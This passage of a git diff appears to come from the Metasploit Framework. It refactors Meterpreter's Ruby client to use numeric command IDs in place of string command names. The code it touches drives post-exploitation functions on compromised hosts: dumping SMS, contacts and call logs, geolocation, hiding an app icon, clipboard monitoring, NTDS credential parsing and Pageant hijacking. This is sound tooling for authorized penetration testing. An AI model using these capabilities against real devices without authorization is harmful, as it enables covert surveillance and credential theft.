@@ -393,7 +402,7 @@ def set_uuid(uuid)
   # Set the session GUID on the target session.
   #
   def set_session_guid(guid)
-    request = Packet.create_request('core_set_session_guid')
+    request = Packet.create_request(COMMAND_ID_CORE_SET_SESSION_GUID)
     request.add_tlv(TLV_TYPE_SESSION_GUID, guid)
 
     client.send_request(request)
@@ -405,7 +414,7 @@ def set_session_guid(guid)
   # Get the session GUID from the target session.
   #
   def get_session_guid(timeout=nil)
-    request = Packet.create_request('core_get_session_guid')
+    request = Packet.create_request(COMMAND_ID_CORE_GET_SESSION_GUID)
 
     args = [request]
     args << timeout if timeout
@@ -419,7 +428,7 @@ def get_session_guid(timeout=nil)
   # Get the machine ID from the target session.
   #
   def machine_id(timeout=nil)
-    request = Packet.create_request('core_machine_id')
+    request = Packet.create_request(COMMAND_ID_CORE_MACHINE_ID)
 
     args = [request]
     args << timeout if timeout
@@ -441,7 +450,7 @@ def machine_id(timeout=nil)
   #
   def native_arch(timeout=nil)
     # Not all meterpreter implementations support this
-    request = Packet.create_request('core_native_arch')
+    request = Packet.create_request(COMMAND_ID_CORE_NATIVE_ARCH)
 
     args = [ request ]
     args << timeout if timeout
@@ -455,7 +464,7 @@ def native_arch(timeout=nil)
   # Remove a transport from the session based on the provided options.
   #
   def transport_remove(opts={})
-    request = transport_prepare_request('core_transport_remove', opts)
+    request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_REMOVE, opts)
 
     return false unless request
 
@@ -468,7 +477,7 @@ def transport_remove(opts={})
   # Add a transport to the session based on the provided options.
   #
   def transport_add(opts={})
-    request = transport_prepare_request('core_transport_add', opts)
+    request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_ADD, opts)
 
     return false unless request
 
@@ -481,7 +490,7 @@ def transport_add(opts={})
   # Change the currently active transport on the session.
   #
   def transport_change(opts={})
-    request = transport_prepare_request('core_transport_change', opts)
+    request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_CHANGE, opts)
 
     return false unless request
 
@@ -496,7 +505,7 @@ def transport_change(opts={})
   def transport_sleep(seconds)
     return false if seconds == 0
 
-    request = Packet.create_request('core_transport_sleep')
+    request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SLEEP)
 
     # we're reusing the comms timeout setting here instead of
     # creating a whole new TLV value
@@ -509,7 +518,7 @@ def transport_sleep(seconds)
   # Change the active transport to the next one in the transport list.
   #
   def transport_next
-    request = Packet.create_request('core_transport_next')
+    request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_NEXT)
     client.send_request(request)
     return true
   end
@@ -518,7 +527,7 @@ def transport_next
   # Change the active transport to the previous one in the transport list.
   #
   def transport_prev
-    request = Packet.create_request('core_transport_prev')
+    request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_PREV)
     client.send_request(request)
     return true
   end
@@ -530,7 +539,7 @@ def enable_ssl_hash_verify
     # Not supported unless we have a socket with SSL enabled
     return nil unless self.client.sock.type? == 'tcp-ssl'
 
-    request = Packet.create_request('core_transport_setcerthash')
+    request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH)
 
     hash = Rex::Text.sha1_raw(self.client.sock.sslctx.cert.to_der)
     request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
@@ -547,7 +556,7 @@ def disable_ssl_hash_verify
     # Not supported unless we have a socket with SSL enabled
     return nil unless self.client.sock.type? == 'tcp-ssl'
 
-    request = Packet.create_request('core_transport_setcerthash')
+    request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH)
 
     # send an empty request to disable it
     client.send_request(request)
@@ -564,7 +573,7 @@ def get_ssl_hash_verify
     # Not supported unless we have a socket with SSL enabled
     return nil unless self.client.sock.type? == 'tcp-ssl'
 
-    request = Packet.create_request('core_transport_getcerthash')
+    request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_GETCERTHASH)
     response = client.send_request(request)
 
     return response.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH)
@@ -617,7 +626,7 @@ def migrate(target_pid, writable_dir = nil, opts = {})
     migrate_payload = generate_migrate_payload(target_process)
 
     # Build the migration request
-    request = Packet.create_request('core_migrate')
+    request = Packet.create_request(COMMAND_ID_CORE_MIGRATE)
 
     request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid)
     request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length)
@@ -641,7 +650,7 @@ def migrate(target_pid, writable_dir = nil, opts = {})
     # Send the migration request. Timeout can be specified by the caller, or set to a min
     # of 60 seconds.
     timeout = [(opts[:timeout] || 0), 60].max
-    response = client.send_request(request, timeout)
+    client.send_request(request, timeout)
 
     # Post-migration the session doesn't have encryption any more.
     # Set the TLV key to nil to make sure that the old key isn't used
@@ -709,7 +718,7 @@ def secure
   # Shuts the session down
   #
   def shutdown
-    request  = Packet.create_request('core_shutdown')
+    request  = Packet.create_request(COMMAND_ID_CORE_SHUTDOWN)
 
     if client.passive_service
       # If this is a HTTP/HTTPS session we need to wait a few seconds
@@ -740,7 +749,7 @@ def negotiate_tlv_encryption
     rsa_key = OpenSSL::PKey::RSA.new(2048)
     rsa_pub_key = rsa_key.public_key
 
-    request  = Packet.create_request('core_negotiate_tlv_encryption')
+    request  = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION)
     request.add_tlv(TLV_TYPE_RSA_PUB_KEY, rsa_pub_key.to_pem)
 
     begin
diff --git a/lib/rex/post/meterpreter/core_ids.rb b/lib/rex/post/meterpreter/core_ids.rb
new file mode 100644
index 0000000000000..36a76e6893896
--- /dev/null
+++ b/lib/rex/post/meterpreter/core_ids.rb
@@ -0,0 +1,51 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+
+# Effectively maps to the number of commands an extension can
+# have. Each extension ID starts at a range boundary and is used
+# to identify extensions.
+COMMAND_ID_RANGE = 1000
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_CORE = 0
+
+COMMAND_ID_CORE_CHANNEL_CLOSE            = EXTENSION_ID_CORE + 1
+COMMAND_ID_CORE_CHANNEL_EOF              = EXTENSION_ID_CORE + 2
+COMMAND_ID_CORE_CHANNEL_INTERACT         = EXTENSION_ID_CORE + 3
+COMMAND_ID_CORE_CHANNEL_OPEN             = EXTENSION_ID_CORE + 4
+COMMAND_ID_CORE_CHANNEL_READ             = EXTENSION_ID_CORE + 5
+COMMAND_ID_CORE_CHANNEL_SEEK             = EXTENSION_ID_CORE + 6
+COMMAND_ID_CORE_CHANNEL_TELL             = EXTENSION_ID_CORE + 7
+COMMAND_ID_CORE_CHANNEL_WRITE            = EXTENSION_ID_CORE + 8
+COMMAND_ID_CORE_CONSOLE_WRITE            = EXTENSION_ID_CORE + 9
+COMMAND_ID_CORE_ENUMEXTCMD               = EXTENSION_ID_CORE + 10
+COMMAND_ID_CORE_GET_SESSION_GUID         = EXTENSION_ID_CORE + 11
+COMMAND_ID_CORE_LOADLIB                  = EXTENSION_ID_CORE + 12
+COMMAND_ID_CORE_MACHINE_ID               = EXTENSION_ID_CORE + 13
+COMMAND_ID_CORE_MIGRATE                  = EXTENSION_ID_CORE + 14
+COMMAND_ID_CORE_NATIVE_ARCH              = EXTENSION_ID_CORE + 15
+COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION = EXTENSION_ID_CORE + 16
+COMMAND_ID_CORE_PATCH_URL                = EXTENSION_ID_CORE + 17
+COMMAND_ID_CORE_PIVOT_ADD                = EXTENSION_ID_CORE + 18
+COMMAND_ID_CORE_PIVOT_REMOVE             = EXTENSION_ID_CORE + 19
+COMMAND_ID_CORE_PIVOT_SESSION_DIED       = EXTENSION_ID_CORE + 20
+COMMAND_ID_CORE_SET_SESSION_GUID         = EXTENSION_ID_CORE + 21
+COMMAND_ID_CORE_SET_UUID                 = EXTENSION_ID_CORE + 22
+COMMAND_ID_CORE_SHUTDOWN                 = EXTENSION_ID_CORE + 23
+COMMAND_ID_CORE_TRANSPORT_ADD            = EXTENSION_ID_CORE + 24
+COMMAND_ID_CORE_TRANSPORT_CHANGE         = EXTENSION_ID_CORE + 25
+COMMAND_ID_CORE_TRANSPORT_GETCERTHASH    = EXTENSION_ID_CORE + 26
+COMMAND_ID_CORE_TRANSPORT_LIST           = EXTENSION_ID_CORE + 27
+COMMAND_ID_CORE_TRANSPORT_NEXT           = EXTENSION_ID_CORE + 28
+COMMAND_ID_CORE_TRANSPORT_PREV           = EXTENSION_ID_CORE + 29
+COMMAND_ID_CORE_TRANSPORT_REMOVE         = EXTENSION_ID_CORE + 30
+COMMAND_ID_CORE_TRANSPORT_SETCERTHASH    = EXTENSION_ID_CORE + 31
+COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS   = EXTENSION_ID_CORE + 32
+COMMAND_ID_CORE_TRANSPORT_SLEEP          = EXTENSION_ID_CORE + 33
+
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extension.rb b/lib/rex/post/meterpreter/extension.rb
index 7db256f222bf1..4789c1d7684f7 100644
--- a/lib/rex/post/meterpreter/extension.rb
+++ b/lib/rex/post/meterpreter/extension.rb
@@ -24,9 +24,9 @@ def initialize(client, name)
   #
   # The name of the extension.
   #
-  attr_accessor :name
+  attr_reader :name
 protected
-  attr_accessor :client # :nodoc:
+  attr_reader :client # :nodoc:
 end
 
 end; end; end
diff --git a/lib/rex/post/meterpreter/extension_mapper.rb b/lib/rex/post/meterpreter/extension_mapper.rb
new file mode 100644
index 0000000000000..d062c54d40016
--- /dev/null
+++ b/lib/rex/post/meterpreter/extension_mapper.rb
@@ -0,0 +1,32 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+
+class ExtensionMapper
+
+  @@klasses = {}
+
+  def self.get_extension_id(name)
+    k = self.get_extension_klass(name)
+    k.id
+  end
+
+  def self.get_extension_klass(name)
+    name.capitalize!
+
+    unless @@klasses[name]
+      require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}")
+      s = name.to_sym
+      @@klasses[name] =  Rex::Post::Meterpreter::Extensions.const_get(s).const_get(s)
+    end
+
+    @@klasses[name.downcase]
+  end
+
+end
+
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index 60e443812d4d5..4a11370d7dc05 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -43,6 +43,10 @@ class Android < Extension
     'dump'   => COLLECT_ACTION_DUMP
   }
 
+  def self.extension_id
+    EXTENSION_ID_ANDROID
+  end
+
   def initialize(client)
     super(client, 'android')
 
@@ -66,20 +70,20 @@ def collect_types
   end
 
   def device_shutdown(n)
-    request = Packet.create_request('android_device_shutdown')
+    request = Packet.create_request(COMMAND_ID_ANDROID_DEVICE_SHUTDOWN)
     request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n)
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
   end
 
   def set_audio_mode(n)
-    request = Packet.create_request('android_set_audio_mode')
+    request = Packet.create_request(COMMAND_ID_ANDROID_SET_AUDIO_MODE)
     request.add_tlv(TLV_TYPE_AUDIO_MODE, n)
-    response = client.send_request(request)
+    client.send_request(request)
   end
 
   def interval_collect(opts)
-    request = Packet.create_request('android_interval_collect')
+    request = Packet.create_request(COMMAND_ID_ANDROID_INTERVAL_COLLECT)
     request.add_tlv(TLV_TYPE_COLLECT_ACTION, COLLECT_ACTIONS[opts[:action]])
     request.add_tlv(TLV_TYPE_COLLECT_TYPE, COLLECT_TYPES[opts[:type]])
     request.add_tlv(TLV_TYPE_COLLECT_TIMEOUT, opts[:timeout])
@@ -182,7 +186,7 @@ def interval_collect(opts)
 
   def dump_sms
     sms = []
-    request = Packet.create_request('android_dump_sms')
+    request = Packet.create_request(COMMAND_ID_ANDROID_DUMP_SMS)
     response = client.send_request(request)
 
     response.each(TLV_TYPE_SMS_GROUP) do |p|
@@ -199,7 +203,7 @@ def dump_sms
 
   def dump_contacts
     contacts = []
-    request = Packet.create_request('android_dump_contacts')
+    request = Packet.create_request(COMMAND_ID_ANDROID_DUMP_CONTACTS)
     response = client.send_request(request)
 
     response.each(TLV_TYPE_CONTACT_GROUP) do |p|
@@ -214,7 +218,7 @@ def dump_contacts
 
   def geolocate
     loc = []
-    request = Packet.create_request('android_geolocate')
+    request = Packet.create_request(COMMAND_ID_ANDROID_GEOLOCATE)
     response = client.send_request(request)
 
     loc << {
@@ -227,7 +231,7 @@ def geolocate
 
   def dump_calllog
     log = []
-    request = Packet.create_request('android_dump_calllog')
+    request = Packet.create_request(COMMAND_ID_ANDROID_DUMP_CALLLOG)
     response = client.send_request(request)
 
     response.each(TLV_TYPE_CALLLOG_GROUP) do |p|
@@ -243,19 +247,19 @@ def dump_calllog
   end
 
   def check_root
-    request = Packet.create_request('android_check_root')
+    request = Packet.create_request(COMMAND_ID_ANDROID_CHECK_ROOT)
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
   end
 
   def hide_app_icon
-    request = Packet.create_request('android_hide_app_icon')
+    request = Packet.create_request(COMMAND_ID_ANDROID_HIDE_APP_ICON)
     response = client.send_request(request)
     response.get_tlv_value(TLV_TYPE_ICON_NAME)
   end
 
   def activity_start(uri)
-    request = Packet.create_request('android_activity_start')
+    request = Packet.create_request(COMMAND_ID_ANDROID_ACTIVITY_START)
     request.add_tlv(TLV_TYPE_URI_STRING, uri)
     response = client.send_request(request)
     if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value
@@ -266,13 +270,13 @@ def activity_start(uri)
   end
 
   def set_wallpaper(data)
-    request = Packet.create_request('android_set_wallpaper')
+    request = Packet.create_request(COMMAND_ID_ANDROID_SET_WALLPAPER)
     request.add_tlv(TLV_TYPE_WALLPAPER_DATA, data)
-    response = client.send_request(request)
+    client.send_request(request)
   end
 
   def send_sms(dest, body, dr)
-    request = Packet.create_request('android_send_sms')
+    request = Packet.create_request(COMMAND_ID_ANDROID_SEND_SMS)
     request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest)
     request.add_tlv(TLV_TYPE_SMS_BODY, body)
     request.add_tlv(TLV_TYPE_SMS_DR, dr)
@@ -289,7 +293,7 @@ def send_sms(dest, body, dr)
   end
 
   def wlan_geolocate
-    request = Packet.create_request('android_wlan_geolocate')
+    request = Packet.create_request(COMMAND_ID_ANDROID_WLAN_GEOLOCATE)
     response = client.send_request(request, 30)
     networks = []
     response.each(TLV_TYPE_WLAN_GROUP) do |p|
@@ -303,7 +307,7 @@ def wlan_geolocate
   end
 
   def sqlite_query(dbname, query, writeable)
-    request = Packet.create_request('android_sqlite_query')
+    request = Packet.create_request(COMMAND_ID_ANDROID_SQLITE_QUERY)
     request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname)
     request.add_tlv(TLV_TYPE_SQLITE_QUERY, query)
     request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable)
@@ -329,9 +333,9 @@ def sqlite_query(dbname, query, writeable)
   end
 
   def wakelock(flags)
-    request = Packet.create_request('android_wakelock')
+    request = Packet.create_request(COMMAND_ID_ANDROID_WAKELOCK)
     request.add_tlv(TLV_TYPE_FLAGS, flags)
-    response = client.send_request(request)
+    client.send_request(request)
   end
 
 end
diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb
index 742a7b7d37076..871573020dd0b 100644
--- a/lib/rex/post/meterpreter/extensions/android/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb
@@ -7,6 +7,26 @@ module Meterpreter
 module Extensions
 module Android
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_ANDROID = 5000
+
+# Associated command ids
+COMMAND_ID_ANDROID_ACTIVITY_START   = EXTENSION_ID_ANDROID + 1
+COMMAND_ID_ANDROID_CHECK_ROOT       = EXTENSION_ID_ANDROID + 2
+COMMAND_ID_ANDROID_DEVICE_SHUTDOWN  = EXTENSION_ID_ANDROID + 3
+COMMAND_ID_ANDROID_DUMP_CALLLOG     = EXTENSION_ID_ANDROID + 4
+COMMAND_ID_ANDROID_DUMP_CONTACTS    = EXTENSION_ID_ANDROID + 5
+COMMAND_ID_ANDROID_DUMP_SMS         = EXTENSION_ID_ANDROID + 6
+COMMAND_ID_ANDROID_GEOLOCATE        = EXTENSION_ID_ANDROID + 7
+COMMAND_ID_ANDROID_HIDE_APP_ICON    = EXTENSION_ID_ANDROID + 8
+COMMAND_ID_ANDROID_INTERVAL_COLLECT = EXTENSION_ID_ANDROID + 9
+COMMAND_ID_ANDROID_SEND_SMS         = EXTENSION_ID_ANDROID + 10
+COMMAND_ID_ANDROID_SET_AUDIO_MODE   = EXTENSION_ID_ANDROID + 11
+COMMAND_ID_ANDROID_SET_WALLPAPER    = EXTENSION_ID_ANDROID + 12
+COMMAND_ID_ANDROID_SQLITE_QUERY     = EXTENSION_ID_ANDROID + 13
+COMMAND_ID_ANDROID_WAKELOCK         = EXTENSION_ID_ANDROID + 14
+COMMAND_ID_ANDROID_WLAN_GEOLOCATE   = EXTENSION_ID_ANDROID + 15
+
 TLV_TYPE_SMS_ADDRESS                 = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9001)
 TLV_TYPE_SMS_BODY                    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9002)
 TLV_TYPE_SMS_TYPE                    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9003)
diff --git a/lib/rex/post/meterpreter/extensions/appapi/appapi.rb b/lib/rex/post/meterpreter/extensions/appapi/appapi.rb
index b85bb7d281605..06878fe0a1364 100644
--- a/lib/rex/post/meterpreter/extensions/appapi/appapi.rb
+++ b/lib/rex/post/meterpreter/extensions/appapi/appapi.rb
@@ -15,6 +15,10 @@ module AppApi
 ###
 class AppApi < Extension
 
+  def self.extension_id
+    EXTENSION_ID_APPAPI
+  end
+
   #
   # Typical extension initialization routine.
   #
@@ -35,7 +39,7 @@ def initialize(client)
   # Get list of installed applications
   #
   def app_list(app_opt)
-    request = Packet.create_request('appapi_app_list')
+    request = Packet.create_request(COMMAND_ID_APPAPI_APP_LIST)
     request.add_tlv(TLV_TYPE_APPS_LIST_OPT, app_opt)
     response = client.send_request(request)
     names = []
@@ -50,7 +54,7 @@ def app_list(app_opt)
   #
   def app_uninstall(packagename)
 
-    request = Packet.create_request('appapi_app_uninstall')
+    request = Packet.create_request(COMMAND_ID_APPAPI_APP_UNINSTALL)
     request.add_tlv(TLV_TYPE_APP_PACKAGE_NAME, packagename)
     response = client.send_request(request)
 
@@ -61,7 +65,7 @@ def app_uninstall(packagename)
   # Install application
   #
   def app_install(apk_path)
-    request = Packet.create_request('appapi_app_install')
+    request = Packet.create_request(COMMAND_ID_APPAPI_APP_INSTALL)
     request.add_tlv(TLV_TYPE_APP_APK_PATH, apk_path)
     response = client.send_request(request)
 
@@ -72,7 +76,7 @@ def app_install(apk_path)
   # Start Main Activity for installed application by Package name
   #
   def app_run(packagename)
-    request = Packet.create_request('appapi_app_run')
+    request = Packet.create_request(COMMAND_ID_APPAPI_APP_RUN)
     request.add_tlv(TLV_TYPE_APP_PACKAGE_NAME, packagename)
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_APP_RUN_ENUM).value
diff --git a/lib/rex/post/meterpreter/extensions/appapi/tlv.rb b/lib/rex/post/meterpreter/extensions/appapi/tlv.rb
index 851e9017eb61d..f2b0fbadd34ef 100644
--- a/lib/rex/post/meterpreter/extensions/appapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/appapi/tlv.rb
@@ -7,6 +7,15 @@ module Meterpreter
 module Extensions
 module AppApi
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_APPAPI = 9000
+
+# Associated command ids
+COMMAND_ID_APPAPI_APP_INSTALL   = EXTENSION_ID_APPAPI + 1
+COMMAND_ID_APPAPI_APP_LIST      = EXTENSION_ID_APPAPI + 2
+COMMAND_ID_APPAPI_APP_RUN       = EXTENSION_ID_APPAPI + 3
+COMMAND_ID_APPAPI_APP_UNINSTALL = EXTENSION_ID_APPAPI + 4
+
 ##
 #
 # Apps
diff --git a/lib/rex/post/meterpreter/extensions/espia/espia.rb b/lib/rex/post/meterpreter/extensions/espia/espia.rb
index 520dcfb33bcfc..06da92e21fdb6 100644
--- a/lib/rex/post/meterpreter/extensions/espia/espia.rb
+++ b/lib/rex/post/meterpreter/extensions/espia/espia.rb
@@ -16,6 +16,9 @@ module Espia
 ###
 class Espia < Extension
 
+  def self.extension_id
+    EXTENSION_ID_ESPIA
+  end
 
   def initialize(client)
     super(client, 'espia')
@@ -29,28 +32,14 @@ def initialize(client)
       ])
   end
 
-  def espia_video_get_dev_image()
-    request = Packet.create_request('espia_video_get_dev_image')
-    response = client.send_request(request)
-
-    return true
-  end
-
-  def espia_audio_get_dev_audio(rsecs)
-    request = Packet.create_request('espia_audio_get_dev_audio')
-    request.add_tlv(TLV_TYPE_DEV_RECTIME, rsecs)
-    response = client.send_request(request)
-
-    return true
-  end
-
   def espia_image_get_dev_screen
-    request  = Packet.create_request( 'espia_image_get_dev_screen' )
+    request = Packet.create_request(COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN)
     response = client.send_request( request )
-    if( response.result == 0 )
-      return response.get_tlv_value( TLV_TYPE_DEV_SCREEN )
+    if response.result == 0
+      response.get_tlv_value(TLV_TYPE_DEV_SCREEN)
+    else
+      nil
     end
-    return nil
   end
 
 end
diff --git a/lib/rex/post/meterpreter/extensions/espia/tlv.rb b/lib/rex/post/meterpreter/extensions/espia/tlv.rb
index 1ae21b9bb207a..e9d62de91920b 100644
--- a/lib/rex/post/meterpreter/extensions/espia/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/espia/tlv.rb
@@ -5,6 +5,12 @@ module Meterpreter
 module Extensions
 module Espia
 
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_ESPIA = 11000
+
+# Associated command ids
+COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN = EXTENSION_ID_ESPIA + 1
+
 TLV_TYPE_DEV_IMAGE = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 911)
 TLV_TYPE_DEV_AUDIO = TLV_META_TYPE_STRING| (TLV_EXTENSIONS + 912)
 TLV_TYPE_DEV_SCREEN = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 913)
diff --git a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb
index a141616637795..8c3561cfc2b5c 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb
@@ -35,7 +35,7 @@ def initialize(client)
   # @return [Hash] Array of field names with associated results.
   #
   def domain_query(domain_name, filter, max_results, page_size, fields)
-    request = Packet.create_request('extapi_adsi_domain_query')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY)
 
     request.add_tlv(TLV_TYPE_EXT_ADSI_DOMAIN, domain_name)
     request.add_tlv(TLV_TYPE_EXT_ADSI_FILTER, filter)
diff --git a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
index ef89b2b2489f2..7c6bb8d7e260f 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb
@@ -24,7 +24,7 @@ def initialize(client)
   # (if it's supported).
   #
   def get_data(download = false)
-    request = Packet.create_request('extapi_clipboard_get_data')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA)
 
     if download
       request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD, true)
@@ -39,11 +39,11 @@ def get_data(download = false)
   # Set the target clipboard data to a text value
   #
   def set_text(text)
-    request = Packet.create_request('extapi_clipboard_set_data')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA)
 
     request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, text)
 
-    response = client.send_request(request)
+    client.send_request(request)
 
     return true
   end
@@ -52,7 +52,7 @@ def set_text(text)
   # Start the clipboard monitor if it hasn't been started.
   #
   def monitor_start(opts)
-    request = Packet.create_request('extapi_clipboard_monitor_start')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START)
     request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_WIN_CLASS, opts[:wincls])
     request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA, opts[:cap_img])
     return client.send_request(request)
@@ -62,7 +62,7 @@ def monitor_start(opts)
   # Pause the clipboard monitor if it's running.
   #
   def monitor_pause
-    request = Packet.create_request('extapi_clipboard_monitor_pause')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE)
     return client.send_request(request)
   end
 
@@ -74,7 +74,7 @@ def monitor_dump(opts)
     purge = opts[:purge]
     purge = true if purge.nil?
 
-    request = Packet.create_request('extapi_clipboard_monitor_dump')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP)
     request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA, pull_img)
     request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_PURGE, purge)
 
@@ -87,7 +87,7 @@ def monitor_dump(opts)
   # Resume the clipboard monitor if it has been paused.
   #
   def monitor_resume
-    request = Packet.create_request('extapi_clipboard_monitor_resume')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME)
     return client.send_request(request)
   end
 
@@ -95,7 +95,7 @@ def monitor_resume
   # Purge the contents of the clipboard capture without downloading.
   #
   def monitor_purge
-    request = Packet.create_request('extapi_clipboard_monitor_purge')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE)
     return client.send_request(request)
   end
 
@@ -106,7 +106,7 @@ def monitor_stop(opts)
     dump = opts[:dump]
     pull_img = opts[:include_images]
 
-    request = Packet.create_request('extapi_clipboard_monitor_stop')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP)
     request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_DUMP, dump)
     request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA, pull_img)
 
diff --git a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb
index 900087ea6d994..05dc02c946f0d 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb
@@ -23,6 +23,10 @@ module Extapi
 ###
 class Extapi < Extension
 
+  def self.extension_id
+    EXTENSION_ID_EXTAPI
+  end
+
   def initialize(client)
     super(client, 'extapi')
 
diff --git a/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb b/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb
index c6fb7515a3fbf..75a4095106ee2 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb
@@ -20,7 +20,7 @@ def initialize(client)
   end
 
   def parse(filepath)
-    request = Packet.create_request('extapi_ntds_parse')
+    request = Packet.create_request(COMMAND_ID_EXTAPI_NTDS_PARSE)
     request.add_tlv( TLV_TYPE_NTDS_PATH, filepath)
     # wait up to 90 seconds for a response
     response = client.send_request(request, 90)
diff --git a/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb b/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb
index dda54561caab2..868522d5d75a2 100644
--- a/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb
+++ b/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb
@@ -1,44 +1,46 @@
 # -*- coding: binary -*-
 
 module Rex
-  module Post
-    module Meterpreter
-      module Extensions
-        module Extapi
-          module Pageant
-            ###
-            # PageantJacker extension - Hijack and interact with Pageant
-            #
-            # Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
-            #
-            ###
-            class Pageant
-              def initialize(client)
-                @client = client
-              end
-
-              def forward(blob, size)
-                return nil unless size > 0 && blob.size > 0
-
-                packet_request = Packet.create_request('extapi_pageant_send_query')
-                packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_SIZE_IN, size)
-                packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_BLOB_IN, blob)
-
-                response = client.send_request(packet_request)
-                return nil unless response
-
-                {
-                  success: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_STATUS),
-                  blob: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_RETURNEDBLOB),
-                  error: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_ERRORMESSAGE)
-                }
-              end
-
-              attr_accessor :client
-            end
-          end
-        end
-      end
-    end
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+module Pageant
+
+###
+# PageantJacker extension - Hijack and interact with Pageant
+#
+# Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
+#
+###
+class Pageant
+  def initialize(client)
+    @client = client
   end
+
+  def forward(blob, size)
+    return nil unless size > 0 && blob.size > 0
+
